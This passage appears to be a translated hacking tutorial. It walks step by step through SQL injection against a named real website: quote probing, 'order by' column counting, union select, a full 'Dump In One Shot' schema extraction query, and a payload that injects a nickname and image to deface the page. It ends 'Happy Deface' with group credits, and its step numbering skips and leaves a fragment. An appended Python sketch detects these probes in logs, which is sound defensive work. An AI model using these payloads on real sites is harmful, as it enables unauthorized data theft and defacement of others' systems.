2. Add a ‘ character after the number, for example http://kansascitynova.org/news.php?id=42’
3. If a syntax error message (blah blah blah) then appears, the site is vulnerable, so just go for it
4. Append an order by clause after the number and find the number that triggers an error, for example:
http://kansascitynova.org/news.php?id=42’+order+by+1 –+- (no error)
http://kansascitynova.org/news.php?id=42’+order+by+2 –+- (no error)
http://kansascitynova.org/news.php?id=42’+order+by+5 –+- (no error)
http://kansascitynova.org/news.php?id=42’+order+by+8 –+- (error)
Here I found that the error number is 8. If you haven't found the error number yet, keep looking until you get it, don't give up, stay motivated 🙂
5. Then we write a union select statement and enter the numbers up to the error number minus one, which gives
http://kansascitynova.org/news.php?id=42’+union+select+1,2,3,4,5,6,7–+-
6. The DIOS numbers, also called the "togel" numbers, then show up on the page: 2 and 5. Here the admin will just go with DIOS number 2, because things feel better as a pair
upload your photo, then copy its code, making sure to change it to the full HTML link like the one in the example
9. ‘<img src =”https://angelscybermoon.blogspot.com/2020/06/link-gambar.com/gambar.jpg”>’ use that code and copy in your image link, for example ‘<img src=”https://i.ibb.co/zhspcnQ/the-mighty-garuda-by-firnadi-d4hyxkf-fullview.jpg”>’ then save it somewhere safe for now
10. We go back to the website from before and dump the tables. To dump the tables in the database we use the DIOS (Dump In One Shot) query, (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x), for example
http://kansascitynova.org/news.php?id=42%27+union+select+1,concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7–+-
11. OK, now we print our nick and image straight away. We use the command. Don't forget to add 0x to
https://target.com/p?id=12’+UNION+SELECT+1,concat(0x496E6A6563746564204279204D722E4B4C41,'<br>’,'<img src =”https://angelscybermoon.blogspot.com/2020/06/link-gambar.com/gambar.jpg”>’,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7–+-
Example:
http://kansascitynova.org/news.php?id=42%27+union+select+1,concat(0x496E6A6563746564204279204D722E4B4C41,%27%3Cbr%3E%27,%27%3Cimg%20src%20=%22https://i.ibb.co/zhspcnQ/the-mighty-garuda-by-firnadi-d4hyxkf-fullview.jpg%22%3E%27,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7–+-
12. And boom!!!!
That's all from me. If you have any questions, just leave a comment
Happy Deface 🙂
Thanks To :
– Angels Cyber Moon
– Satanic Devil
– LolzSec X-PLOIT
– Malang Grey Hat
– Malang Cyber Army
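A defender-side view of the request sequence in steps 2 to 11, as an added example that is not part of the original post: a Python sketch that flags those probes in web access logs and reconstructs the order by ramp per client. The log entries, client addresses, rule names and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed (client IP, request path) pairs; not taken from a real server log.
SAMPLE_LOG = [
    ("203.0.113.7", "/news.php?id=42"),
    ("203.0.113.7", "/news.php?id=42'"),
    ("203.0.113.7", "/news.php?id=42'+order+by+1--+-"),
    ("203.0.113.7", "/news.php?id=42'+order+by+5--+-"),
    ("203.0.113.7", "/news.php?id=42'+order+by+8--+-"),
    ("203.0.113.7", "/news.php?id=42%27+union+select+1,2,3,4,5,6,7--+-"),
    ("203.0.113.7", "/news.php?id=42%27+union+select+1,concat(database(),(select(0)from(information_schema.columns))),3--+-"),
    ("198.51.100.9", "/news.php?id=17"),
    ("198.51.100.9", "/search.php?q=order+by+phone"),  # benign near-miss
]

RULES = {
    # A numeric parameter followed by a quote (straight or typographic).
    "quote_in_numeric_id": re.compile(r"^\d+['\u2018\u2019]"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"information_schema\.", re.I),
    "sql_function": re.compile(r"\b(database|version|concat)\s*\(", re.I),
}

def classify(path):
    """Return the rule names matched by any URL-decoded query-string value."""
    hits = set()
    for pair in urlsplit(path).query.split("&"):
        value = unquote_plus(pair.partition("=")[2])
        hits.update(name for name, rx in RULES.items() if rx.search(value))
    return hits

def suspicious_clients(log, min_rules=2):
    """Flag clients whose requests match at least min_rules distinct rules."""
    seen = defaultdict(set)
    for ip, path in log:
        seen[ip] |= classify(path)
    return {ip: sorted(r) for ip, r in seen.items() if len(r) >= min_rules}

def order_by_ramp(log):
    """Per client, the ORDER BY indices tried; a rising run is column-count probing."""
    tried = defaultdict(list)
    for ip, path in log:
        query = unquote_plus(urlsplit(path).query)
        tried_now = re.findall(r"\border\s+by\s+(\d+)", query, re.I)
        if tried_now:
            tried[ip].extend(int(n) for n in tried_now)
    return dict(tried)
```

Matches like these are a triage signal only; the underlying fix is to bind `id` as a query parameter (or cast it to an integer) so the appended quote never reaches the SQL parser.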